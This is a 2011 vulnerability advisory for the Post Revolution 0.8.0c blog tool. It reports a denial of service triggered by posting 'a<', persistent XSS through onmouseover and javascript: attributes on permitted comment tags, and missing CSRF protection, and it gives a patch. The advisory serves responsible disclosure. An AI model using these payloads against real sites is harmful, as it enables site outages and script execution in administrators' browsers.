Post Revolution 0.8.0c XSS / XSRF / Denial Of Service



EKU-ID: 408 CVE: 2011-1952 OSVDB-ID:
Author: Javier Bassi Published: 2011-06-02 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


info
�����������
Name :  Post Revolution 0.8.0c Multiple Remote Vulnerabilities
Class: Design Error && Input Validation Error
CVE: CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
Remote: Yes
Local: No
Credit :  Javier Bassi <javierbassi [at] gmail [dot] com>
Vulnerable :  All versions prior to and including 0.8.0c are affected.
Vendor Hompeage :  http://postrev.com.ar



description
�����������
Post Revolution is an open source blog tool and publishing platform
powered by PHP and MySQL.



discussion
�����������
Post Revolution is prone to multiple remote vulnerabilities, including:
1. A Denial of service vulnerability. (CWE-835) (CVE-2011-1952)
2. Persistent Cross-site scripting vulnerabilities. (CWE-79) (CVE-2011-1953)
3. Cross-site request forgery vulnerabilities. (CWE-352) (CVE-2011-1954)

An attacker may leverage these issues to cause a denial-of-service
condition, perform certain administrative actions, execute arbitrary
script code in the browser of an unsuspecting user in the context of
the website, steal cookie-based authentication credentials, and gain
unauthorized access to the affected application.
Post Revolution 0.8.0c is vulnerable.



timeline
�����������
2011.05.22 � Informed developers
2011.05.23 � Patch for issues 1 & 2 released.
2011.06.01 � Disclosed



details/pocs
�����������
1. Denial of Service vulnerability
Post Revolution allows some HTML tags in the comments and removes all
non-permitted.
The vulnerable code is in the lines 456 to 462 in common.php:

        while(stripos($s,'<') > 0){
            $pos[1] = stripos($s,'<');
            $pos[2] = stripos($s,'>', $pos[1]);
            $len[1] = $pos[2] - $pos[1] + 1;
            $x = substr($s,$pos[1],$len[1]);
            $s = str_replace($x,'',$s);
        }

This code tries to remove every non-permitted HTML tag. $s is the
content of the comment. An attacker could post a comment with just
'a<' and then while(stripos($s,'<') > 0) will always be true because
pos[1]=1, pos[2] will be NULL, len[1]=0, then x = NULL so $s will be
again 'a<'.
This will cause an infinite loop that will end when php kills the
script printing:
Fatal error: Maximum execution time of 30 seconds exceeded in
/var/www/postrev/common.php on line 459


2. Cross-site scripting vulnerabilities.
Post Revolution allows the following tags in the comments:
p,strong,a,em,i,img,li,ol,video,blockquote
and don't sanitize their attributes.
So the following XSS vectors work:
<a href="javascript:alert(1)">some text</a>
<p onmouseover="javascript:alert(1)">some text</p>
<a href="" onmouseover="javascript:alert(1);">some text</a>
<em onmouseover="javascript:alert(1)">some text</em>
<strong onmouseover="javascript:alert(1)">some text</strong>
<i onmouseover="javascript:alert(1)">some text</i>
<img src="https://encrypted.google.com/images/logos/ssl_logo_lg.gif"
onmouseover="javascript:alert(1)" />
<ol><li onmouseover="javascript:alert(1)">some text</li></ol>
<ol onmouseover="javascript:alert(1)"><li>1</li><li>2</li></ol>
<blockquote onmouseover="javascript:alert(1)">some text</blockquote>

The same with other events like onclick, onmouseout, onmousemove, onkeydown, etc
Also note that the PR doesn't close the tag for you, so its not
necesary to get the comment mouseovered by the admin. If the attacker
post <p onmouseover="javascript:alert(1)">some text
mouseover event will be triggered when the admin moves the mouse
anywhere below attacker's comment.


3. Cross-site request forgery vulnerabitiles.
There is CSRF everywhere in ajax-weblog-guardar.php, verpost.php,
comments.php, perfil.php, etc. PR 0.8.0c has absolutely no protection
against CSRF in any form except for anonymous comments and
registration that has a captcha.



solution
�����������
You can fix DoS and XSS vulns fast by replacing the whole function
check_html in common.php from line 416 to 471 with
function check_html($s){
        return htmlspecialchars($s);
    }

Users will not be able to format their comments with HTML but Post
Revolution already has BBcode so there was no need of HTML in comments
in the first place.
NO HTML FOR YOU!

Fix the CSRFs will require some coding.
Vendor has released a patch for issues 1 and 2:
postrev.com.ar



References
������-
1. Advisory URL: http://javierb.com.ar/2011/06/01/postrev-vunls/